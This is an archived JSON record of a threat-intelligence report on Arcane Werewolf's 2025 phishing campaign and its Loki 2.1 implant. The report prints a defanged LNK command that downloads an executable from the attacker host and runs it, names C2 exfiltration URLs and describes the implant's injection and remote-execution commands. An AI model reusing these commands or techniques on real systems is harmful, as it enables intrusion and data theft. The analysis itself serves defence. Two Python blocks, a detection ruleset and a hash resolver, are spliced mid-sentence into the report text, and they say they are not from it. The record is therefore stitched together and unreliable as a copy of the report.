{
	"id": "2461739b-192c-4d91-b325-cc086229431c",
	"created_at": "2026-04-10T03:22:10.755348Z",
	"updated_at": "2026-04-10T03:22:16.635535Z",
	"deleted_at": null,
	"sha1_hash": "5e03ea2d08d7a521f612245d2b2b137a89aaeac5",
	"title": "Arcane Werewolf revamps its arsenal with Loki 2.1 implant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1627459,
	"plain_text": "Arcane Werewolf revamps its arsenal with Loki 2.1 implant\r\nPublished: 2025-12-17 · Archived: 2026-04-10 02:13:11 UTC\r\nIn October and November 2025, BI.ZONE Threat Intelligence observed malicious activity by Arcane Werewolf (Mythic\r\nLikho) targeting Russian manufacturing enterprises. Retrospective analysis suggests that the threat actor most likely used\r\nphishing emails as the initial access vector, consistent with its previous campaigns. The messages were irrecoverable but\r\npresumably contained links to a malicious archive hosted on the attackers’ C2 server. The links directed victims to a spoofed\r\nwebsite imitating a Russian manufacturing company.\r\nAdversaries often send phishing emails impersonating major or well‑known organizations, as well as national regulators,\r\nor reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable\r\nlogos and other branding elements make phishing emails appear more authentic, prompting victims to open them.\r\nIt is important to remember that the organizations whose brands are abused by attackers are not liable for the actions\r\nof criminals and the associated damage.\r\nKey findings\r\nArcane Werewolf continues to target the Russian manufacturing sector.\r\nThe cluster develops and updates its custom malware toolkit, deploying a new Loki 2.1 implant compatible with\r\nthe Mythic and Havoc post‑exploitation frameworks.\r\nThe threat actor uses domain names closely resembling those of the victim organizations.\r\nOctober 2025\r\nDistribution\r\nIn October 2025, BI.ZONE Threat Intelligence recorded Arcane Werewolf activity in which the adversaries distributed links\r\nto ZIP archives containing malicious LNK files. The links pointed to a network resource impersonating a Russian\r\nmanufacturing company, for example: hxxps://disk.npo-[redacted][.]ru/files/1a427fba.zip . 
After victims clicked it,\r\nthe malicious ZIP was retrieved from a nested URL: hxxps://files.npo-[redacted][.]ru/direct/7b44646d-1b09-45b1-8977-62327e6ec1e7/1a427fba/%D0%98%D1%81%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B5%D0%B5%20%E2%84%96%207784%20%D0%BE%D1%82%2010.10.2025%20%D0%BE%D1%8\r\nMalicious archive download\r\nZIP file\r\nThe downloaded archive Исходящее № 7784 от 10.10.2025 от АО _НПП _[redacted]_.zip (Outgoing notification\r\nNo. 7784 dated 2025-10-10 from [organization]) contains the malicious file Исходящее № 7784 от 10.10.2025 от АО _НПП _[redacted]_.pdf.lnk (Outgoing notification No. 7784 dated 2025-10-10 from [organization]) and the Photos\r\nfolder with several JPG images.\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 1 of 9\n\nZIP archive contents\r\nLNK file\r\nThe opening of Исходящее № 7784 от 10.10.2025 от АО _НПП _[redacted]_.pdf.lnk (Outgoing notification\r\nNo. 7784 dated 2025-10-10 from [organization]) triggers the following command:\r\ncmd.exe /v:on /c \"set u=hxxps://192.168.1[.]1/m2.png \u0026\u0026 set u=!u:192.168.1[.]1=f.npo-[redacted][.]ru! \u0026\u0026 powershell -c \"$\r\nAs a result, PowerShell is leveraged to retrieve an executable from hxxps://f.npo-[redacted][.]ru/m2.png , save\r\nit as %TEMP%\\icon2.png , and run it via conhost.exe .\r\nGo dropper\r\nThe downloaded icon2.png is a PE32+ executable—a malicious dropper written in Go. 
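The LNK stage above, and the droppers' habit of starting the next stage through conhost.exe, leave three traits in process-creation telemetry: cmd.exe is started with delayed expansion and the URL is assembled with a !var:old=new! substitution (the placeholder IP 192.168.1[.]1 is swapped for the real host only at run time, so the domain never appears as one string in the LNK); the downloaded PE is written under an image extension; and conhost.exe is handed a data-extension path to run. The Python below is an added example, not code from the report or from BI.ZONE, that turns those traits into three command-line rules and runs them over constructed sample command lines. The host f.npo-example.invalid, the user path and the benign lines in the sample are invented for the example and are not indicators from the incident.

```python
import re

DQ = chr(34)  # double-quote character, built with chr() so the sample embeds cleanly in this record
BS = chr(92)  # backslash character, same reason
TEMP = 'C:' + BS + 'Users' + BS + 'user' + BS + 'AppData' + BS + 'Local' + BS + 'Temp'

# Constructed sample process-creation command lines (Sysmon event 1 / EDR style), modelled
# on the LNK chain in the report. The host f.npo-example.invalid, the user name and the
# benign lines are invented for this example; none of this is telemetry from the incident.
SAMPLE_COMMAND_LINES = [
    # 0: the LNK launches cmd.exe, which rebuilds the URL with delayed expansion
    'cmd.exe /v:on /c ' + DQ + 'set u=https://192.168.1.1/m2.png && set u=!u:192.168.1.1=f.npo-example.invalid! '
    + '&& powershell -c ' + DQ + 'iwr -Uri $env:u -OutFile $env:TEMP' + BS + 'icon2.png;conhost.exe $env:TEMP'
    + BS + 'icon2.png' + DQ + DQ,
    # 1: the child PowerShell downloads to a .png name and hands it to conhost.exe
    'powershell -c ' + DQ + 'iwr -Uri $env:u -OutFile $env:TEMP' + BS + 'icon2.png;conhost.exe $env:TEMP'
    + BS + 'icon2.png' + DQ,
    # 2: conhost.exe proxy-executing the disguised PE (variables already expanded)
    'conhost.exe ' + TEMP + BS + 'icon2.png',
    # 3: the Go dropper starting the loader the same way
    'cmd.exe /C conhost.exe ' + TEMP + BS + 'chrome_proxy.pdf',
    # 4-6: benign noise that the rules must not flag
    BS + '??' + BS + 'C:' + BS + 'WINDOWS' + BS + 'system32' + BS + 'conhost.exe 0xffffffff -ForceV1',
    'powershell -c ' + DQ + 'iwr -Uri https://updates.example.invalid/agent.msi -OutFile C:' + BS + 'tools'
    + BS + 'agent.msi' + DQ,
    'cmd.exe /c echo build finished',
]

DATA_EXT = 'png|jpe?g|gif|bmp|pdf|txt|docx?|xlsx?|dat|tmp'
RULES = {
    # cmd.exe started with delayed expansion (/v:on) and a !var:old=new! substitution,
    # the trick the LNK uses to keep the real host out of its static strings
    'cmd_delayed_expansion_url_rewrite': re.compile(
        'cmd(?:[.]exe)?[ ]+/v(?::on)?[ ].*![A-Za-z_]+:[^=!]+=[^!]*!', re.I),
    # a PowerShell web download written to a name with an image or document extension
    'download_to_data_extension': re.compile(
        '(?:iwr|invoke-webrequest|curl|wget)[^;|]*-outfile[ ]+[^ ;]+[.](?:' + DATA_EXT + ')(?:[ ;' + DQ + ']|$)', re.I),
    # conhost.exe handed a file path whose extension is not .exe (legitimate launches pass
    # a handle value such as 0x4 or option switches, never a data file)
    'conhost_proxy_execution': re.compile(
        'conhost(?:[.]exe)?[ ]+(?!0x|--)[^ ]*[.](?!exe(?:[ ' + DQ + ']|$))[A-Za-z0-9]{2,4}(?:[ ' + DQ + ']|$)', re.I),
}


def detect(command_lines):
    # Map each rule name to the indices of the command lines it matched
    hits = {name: [] for name in RULES}
    for i, line in enumerate(command_lines):
        for name, rx in RULES.items():
            if rx.search(line):
                hits[name].append(i)
    return hits


def suspicious_lines(command_lines):
    # Sorted indices of every command line that matched at least one rule
    flagged = set()
    for idx_list in detect(command_lines).values():
        flagged.update(idx_list)
    return sorted(flagged)


if __name__ == '__main__':
    for name, idxs in detect(SAMPLE_COMMAND_LINES).items():
        print('%-36s %s' % (name, idxs))
    print('flagged:', suspicious_lines(SAMPLE_COMMAND_LINES))
```

The rules need command-line text (Sysmon event 1, Windows 4688 with command-line auditing, or the equivalent EDR field). The conhost rule is the strongest single signal: conhost.exe is normally launched by the console subsystem with a handle value or an option switch, not with a file path, so any data-extension argument deserves an alert; the download rule is noisier and should be tuned against the extensions seen in the environment.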
This file contains an embedded\r\npath to the main module directory: C:\\Users\\qwerty\\Desktop\\NEW_SKLEIKA\\ready_payloads\\mass_1310 .\r\nThe dropper carries two Base64‑encoded payloads:\r\nchrome_proxy.pdf , a PE32+ executable (malicious loader)\r\n09.2025.pdf , a PDF decoy\r\nDropper’s Base64‑encoded payload\r\nThe dropper decodes the payloads, writes them to %TEMP% , and executes the following commands:\r\ncmd.exe /C conhost.exe %TEMP%\\chrome_proxy.pdf , which runs the malicious loader via conhost.exe\r\ncmd.exe /C start \"\" %TEMP%\\7784_ot09.2025.pdf , which opens the decoy\r\nHere are the example contents of the decoy 7784_ot_29.09.2025.pdf :\r\nPDF decoy contents\r\nLoki 2.0 loader\r\nThe malicious loader chrome_proxy.pdf is a PE32+ executable identified as the Loki 2.0 loader. Loki typically comprises\r\ntwo components—a loader and an implant. The implant is compatible with the Mythic and Havoc post‑exploitation\r\nframeworks. The loader’s key capabilities include collecting basic host information (internal IP address, OS version,\r\nusername, computer name), AES‑encrypting and Base64‑encoding the collected data, exfiltrating it to the C2 server, polling\r\nthe server for a malicious payload, and executing it.\r\nAt the time of this research, we were unable to retrieve the Loki implant.\r\nThe collected data is exfiltrated via a GET request to the following URL: hxxps://docs.npo-[redacted][.]ru/data?q=[encoded_base64_enc_data] .\r\nExfiltrated data\r\nNovember 2025\r\nDescription\r\nIn November 2025, BI.ZONE Threat Intelligence registered further Arcane Werewolf activity. We were not able to fully\r\nreconstruct the attack chain. This incident involved a new C++ dropper ( .cpp ) and updated Loki 2.1. 
We also identified the\r\nadversaries’ C2 server masquerading as a Russian manufacturing company website. Example URL observed:\r\nhxxps://cloud.electropriborzavod[.]ru/files/d8287185e4ae695a .\r\nSpoofed website contents\r\nC++ dropper\r\nThis is a PE32+ executable written in C++. Its payloads are compressed and embedded in the resource section.\r\nAlong with each payload, the resources contain the full target path for writing it to disk and its size. The\r\ndropper dynamically retrieves the required WinAPI functions and extracts the payloads to disk using NtCreateFile and\r\nZwWriteFile :\r\nC:\\Users\\Public\\Documents\\исх._7028-69_от_05.11.2025_О_проведении_внутреннего_расследования.pdf (Outgoing ref. 7028-69 dated 2025-11-05, on conducting an internal investigation), a PDF decoy\r\nC:\\Windows\\Temp\\csrss64.exe , the Loki 2.1 loader\r\nOnce extracted, the dropper opens the decoy by running cmd.exe /C start C:\\Users\\Public\\Documents\\исх._7028-69_от_05.11.2025_О_проведении_внутреннего_расследования.pdf (Outgoing ref. 7028-69 dated 2025-11-05, on conducting an internal investigation). It then executes C:\\Windows\\Temp\\csrss64.exe via the WinAPI function CreateProcessW .\r\nDecoy contents\r\nLoki 2.1\r\nIn this case, the Loki 2.1 loader also collected host information, AES‑encrypted the data, Base64‑encoded and sent it to the\r\nC2 server hxxps://cdn.electropriborzavod[.]ru/index?data=[encoded_base64_enc_data] .\r\nUniquely, this loader instance not only fetches the implant from the C2 server but also carries a local, upgraded Loki implant\r\nwithin itself. The loader decrypts the embedded implant from its configuration and invokes the exported start function\r\nin the loader’s own process memory.\r\nThe Loki 2.1 implant supports the same set of commands as Loki 2.0. 
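Loki 2.0 dispatches commands by djb2 hash and Loki 2.1 by ordinal, as this section describes, and the MITRE table further down notes that djb2 also hashes the WinAPI function and library names that Loki and the C++ dropper resolve dynamically. Resolving such hashes during analysis means recomputing the hash over candidate names. The Python below is an added example of that, not code from the report, from BI.ZONE or from the malware: it implements the Bernstein djb2 (seed 5381, h = h*33 + c over the ASCII bytes, truncated to 32 bits) plus the xor variant, builds hash-to-name tables for the twelve Loki commands and for the WinAPI names the report mentions, reports which variant explains a set of observed hashes, and maps a Loki 2.1 ordinal back to its command through the same list. Which variant, seed and case handling Loki actually uses is not stated in the report, so those are assumptions, and the observed hashes in the demo are computed in the script rather than taken from a sample.

```python
LOKI_COMMANDS = [  # list index equals the Loki 2.1 ordinal given in the command table of the report
    'exit', 'sleep', 'upload', 'download', 'create-process', 'inject',
    'cd', 'kill-process', 'bof', 'pwd', 'token', 'env',
]
# WinAPI names the report mentions; that Loki hashes exactly these names is an assumption of this example
API_NAMES = ['NtCreateFile', 'ZwWriteFile', 'CreateProcessW', 'NtOpenProcess',
             'NtTerminateProcess', 'SetCurrentDirectoryW', 'GetCurrentDirectoryW']


def djb2(name, seed=5381, xor=False, lowercase=False, width=32):
    # Bernstein djb2: h = h*33 + c over the ASCII bytes, truncated to width bits.
    # xor=True selects the h*33 ^ c variant; lowercase models case-insensitive hashing.
    # The report does not say which variant Loki uses, so these parameters are assumptions.
    if lowercase:
        name = name.lower()
    mask = (1 << width) - 1
    h = seed
    for c in name.encode('ascii'):
        h = ((h * 33) ^ c) if xor else (h * 33 + c)
        h &= mask
    return h


VARIANTS = {
    'djb2_add': dict(xor=False),
    'djb2_xor': dict(xor=True),
    'djb2_add_lower': dict(xor=False, lowercase=True),
    'djb2_xor_lower': dict(xor=True, lowercase=True),
}


def build_table(names, **variant):
    # hash -> name for one variant; a collision raises instead of silently overwriting
    table = {}
    for n in names:
        h = djb2(n, **variant)
        if table.get(h, n) != n:
            raise ValueError('hash collision: %s and %s' % (table[h], n))
        table[h] = n
    return table


def resolve(hashes, names, **variant):
    # Translate hashes pulled from a sample back to names; unknown values are kept as hex
    table = build_table(names, **variant)
    return [table.get(h, 'unknown(0x%08x)' % h) for h in hashes]


def matching_variants(hashes, names):
    # Which variants explain every observed hash? An empty list means a different seed or algorithm
    found = []
    for vname, params in VARIANTS.items():
        table = build_table(names, **params)
        if all(h in table for h in hashes):
            found.append(vname)
    return found


def ordinal_to_command(ordinal):
    # Loki 2.1 dispatch: the command is a plain index into the table above
    if 0 <= ordinal < len(LOKI_COMMANDS):
        return LOKI_COMMANDS[ordinal]
    return 'unknown'


if __name__ == '__main__':
    # Constructed: hashes as they might be lifted from a Loki 2.0 dispatch table, computed
    # here with the xor variant to show variant identification; not values from a sample
    observed = [djb2(n, xor=True) for n in ('inject', 'cd', 'bof')]
    print('variants:', matching_variants(observed, LOKI_COMMANDS))
    print('resolved:', resolve(observed, LOKI_COMMANDS, xor=True))
    for i, n in enumerate(LOKI_COMMANDS):
        print('ordinal %2d  djb2 0x%08x  %s' % (i, djb2(n), n))
    for n in API_NAMES:
        print('api 0x%08x  %s' % (djb2(n), n))
```

If no variant matches the hashes lifted from a sample, the next step is to try other seeds or a different algorithm rather than to distrust the name list: the command names are fixed by the command set, so the hash function is the only unknown.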
The only difference is how commands are identified:\r\nwhere Loki 2.0 mapped each command to a certain djb2 hash value, Loki 2.1 maps commands to ordinal numbers.\r\nThe Loki 2.1 implant commands are listed below.\r\nCommand No. | Description | Loki 2.0 analogue\r\n0 | Terminate the implant’s operation | exit\r\n1 | Change the interval between calls to the C2 server | sleep\r\n2 | Upload a file from the C2 server to the compromised host | upload\r\n3 | Download a file from the compromised host to the C2 server | download\r\n4 | Start a process via CreateProcessW. If no process/flags are specified, run C:\\Windows\\System32\\cmd.exe with the /C flag and redirect I/O streams through a pipe | create-process\r\n5 | Inject code into a target process, with options to: inject a DLL by PID (the entry point, an exported function, is located via djb2 hash); inject shellcode by PID; inject shellcode via a process handle | inject\r\n6 | Change the current working directory via the WinAPI functions SetCurrentDirectoryW and GetCurrentDirectoryW | cd\r\n7 | Terminate the specified process via the WinAPI functions NtOpenProcess and NtTerminateProcess | kill-process\r\n8 | Execute a Beacon Object File (BOF) | bof\r\n9 | Obtain the present working directory | pwd\r\n10 | Manage Windows access tokens | token\r\n11 | Retrieve all environment variables | env\r\nIndicators of compromise\r\nHash sums\r\nZIP\r\n6ccd834fdbba07cf071e3c6de703fbc7f9de10584df127ced27537db2e1a5a03\r\nLNK\r\ne90f7f8594333e0a955a1daccbf5e9030ea86fa3c5c39f58b69d313304020fdd\r\nDecoys\r\nf0cc251a2eb4a73aa20a8a90223600c9053a12ee94a1698ccbb9d189758ff4cb\r\nfcd63239e4065414ba23d1546e18248653f6d937276520f16cf9a29308f65439\r\nGo 
dropper\r\n5f1d3992e426f47b572af12160f3cc7ac6c90634b17fd6a087eb1644a60a71f8\r\nC++ droppers\r\nbe317297dae16dd7b90ddd972b40aca810ff52f6a01a06c96d2dc4bbdd08231d\r\n0f728de0881dc37e79d3e065a331b21f6acadb7d129db2a5bfc27551bba3892e\r\nLoki 2.0 loaders\r\n67751c565593ad4557e73a521b2da96431937296f9dba7d03839e9496031fcbb\r\ne45a1fca84ea0de58f88fe8930b0309f9d736b7384a12f01b7843a9f6469d64b\r\n7fbb29f8724fddfb32b29543e046cf4aceab8f10e5120150f58d7a119162c631\r\nLoki 2.1 loaders\r\n551c0455a608edd88ecd6946c93ed2ac9a68a48148630975a17905205629f617\r\nf73fe375cddea8a869edad7dd33b3783090113ff0dd0ab3b4e275006be40cadc\r\nLoki 2.1 implant\r\nc0de8f8292721192cabe33ac51f2b26468bb2ca70f1e49cfb4647ff70bb14d23\r\nNetwork indicators\r\nnpo-[redacted][.]ru\r\ndisk.npo-[redacted][.]ru\r\nfiles.npo-[redacted][.]ru\r\nf.npo-[redacted][.]ru\r\ndocs.npo-[redacted][.]ru\r\ntest.npo-[redacted][.]ru\r\nelectropriborzavod[.]ru\r\ncloud.electropriborzavod[.]ru\r\ncdn.electropriborzavod[.]ru\r\nhxxps://disk.npo-[redacted][.]ru/files/1a427fba.zip\r\nhxxps://files.npo-[redacted][.]ru/direct/7b44646d-1b09-45b1-8977-62327e6ec1e7/1a427fba/%D0%98%D1%81%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B5%D0%B5%20%E2%84%96%207784%20%D0%BE%D1%82%2010.10.2025%20%D0%BE%D1%8\r\nhxxps://f.npo-[redacted][.]ru/m2.png\r\nhxxps://docs.npo-[redacted][.]ru/data?q=[base64_enc_data]\r\nhxxps://cloud.electropriborzavod[.]ru/files/d8287185e4ae695a\r\nhxxps://cdn.electropriborzavod[.]ru/index?data=[base64_enc_data]\r\nhxxps://static.my[redacted][.]ru/provider?client=[base64_enc_data]\r\nMITRE ATT\u0026CK\r\nTactic | Technique | Procedure\r\nInitial Access | Phishing: Spearphishing Link | Arcane Werewolf uses links in phishing emails to load malware\r\nExecution | Command and Scripting Interpreter: PowerShell | Uses a malicious LNK file to run the following PowerShell command: powershell -c \"$ProgressPreference='SilentlyContinue' ;iwr -Uri $env:u -OutFile $env:TEMP\\icon2.png;conhost.exe $env:TEMP\\icon2.png\"
Execution | Command and Scripting Interpreter: Windows Command Shell | Uses a malicious LNK file to run the following CMD command: cmd.exe /v:on /c \"set u=hxxps://192.168.1[.]1/m2.png \u0026\u0026 set u=!u:192.168.1[.]1=[malicious_domain]!\r\nExecution | Command and Scripting Interpreter: Windows Command Shell | Employs CMD commands in droppers to execute the following files: cmd.exe /C conhost.exe [malicious_file_path] and cmd.exe /C start [decoy_file_path]\r\nExecution | Command and Scripting Interpreter: Windows Command Shell | Leverages the Loki implant to remotely execute commands via the cmd.exe interpreter\r\nExecution | Native API | Uses the WinAPI function CreateProcessW in the C++ dropper to execute the malicious payload\r\nExecution | Native API | Uses the WinAPI function CreateProcessW in the Loki implant to run the process as instructed by the C2 server\r\nExecution | User Execution: Malicious Link | Attempts to lure victims into clicking links in phishing emails that lead to malware downloads\r\nExecution | User Execution: Malicious File | The victim must unpack the ZIP archive and open the embedded LNK file to trigger the compromise\r\nDefense Evasion | Deobfuscate/Decode Files or Information | Arcane Werewolf employs various droppers to deobfuscate/decode embedded payloads\r\nDefense Evasion | Indirect Command Execution | Employs conhost.exe to run the following malicious executables: conhost.exe %TEMP%\\icon2.png and conhost.exe %TEMP%\\chrome_proxy.pdf\r\nDefense Evasion | Masquerading: Double File Extension | Uses the double extension .pdf.lnk in an LNK name\r\nDefense Evasion | Masquerading: Masquerade File Type | Uses .png and .pdf extensions to disguise its malicious executables\r\nDefense Evasion | Obfuscated Files or Information: Dynamic API Resolution | Leverages the djb2 algorithm to hash the names of WinAPI functions and libraries in Loki and the C++ dropper\r\nDefense Evasion | Obfuscated Files or Information: Embedded Payloads | Embeds the Loki implant in the Loki 2.1 loader\r\nDefense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | Embeds a Base64‑encoded payload in the Go dropper
Defense Evasion | Obfuscated Files or Information: Compression | Embeds a compressed payload in the C++ dropper’s resource section\r\nDefense Evasion | Process Injection | Uses the Loki implant to inject shellcode into certain processes (as instructed by the C2 server)\r\nDefense Evasion | Process Injection: Dynamic-link Library Injection | Uses the Loki implant to inject DLLs into certain processes (as instructed by the C2 server)\r\nDiscovery | System Information Discovery | Leverages the Loki loader to retrieve data such as computer name and OS version\r\nDiscovery | System Network Configuration Discovery | Leverages the Loki loader to obtain the internal IP addresses of compromised hosts\r\nDiscovery | System Owner/User Discovery | Leverages the Loki loader to obtain the system username\r\nCommand and Control | Application Layer Protocol: Web Protocols | Communicates with the C2 server over HTTPS in Loki\r\nCommand and Control | Data Encoding: Standard Encoding | Employs Base64 to encode the encrypted data exfiltrated to the C2 server\r\nCommand and Control | Encrypted Channel: Symmetric Cryptography | Uses the AES algorithm in the Loki loader to encrypt data exfiltrated to the C2 server\r\nCommand and Control | Ingress Tool Transfer | Uses the Loki implant to upload files to the compromised host (as instructed by the C2 server)\r\nExfiltration | Exfiltration Over C2 Channel | Uses the Loki implant to exfiltrate files from the compromised host to the C2 server (as instructed by the latter)\r\nImpact | Service Stop | Uses the Loki implant to terminate certain processes (as instructed by the C2 server)\r\nHow to protect your company from such threats\r\nAttacks 
similar to those by Arcane Werewolf are not only critical to detect but also to neutralize before they affect the\r\ninfrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and\r\nresponse practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident\r\nresponse, either automated or manual.\r\nBuilding an effective cybersecurity strategy requires an understanding of tools exploited by threat actors in the wild.\r\nBI.ZONE Threat Intelligence can greatly simplify this task. The portal provides information about the current attacks, threat\r\nactors, their tactics, techniques, tools, and exploited vulnerabilities. This intelligence helps you stay proactive and accelerate\r\nyour incident response.\r\nSource: https://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/"
	],
	"report_names": [
		"arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki"
	],
	"threat_actors": [],
	"ts_created_at": 1775791330,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.pdf",
		"text": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.txt",
		"img": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.jpg"
	}
}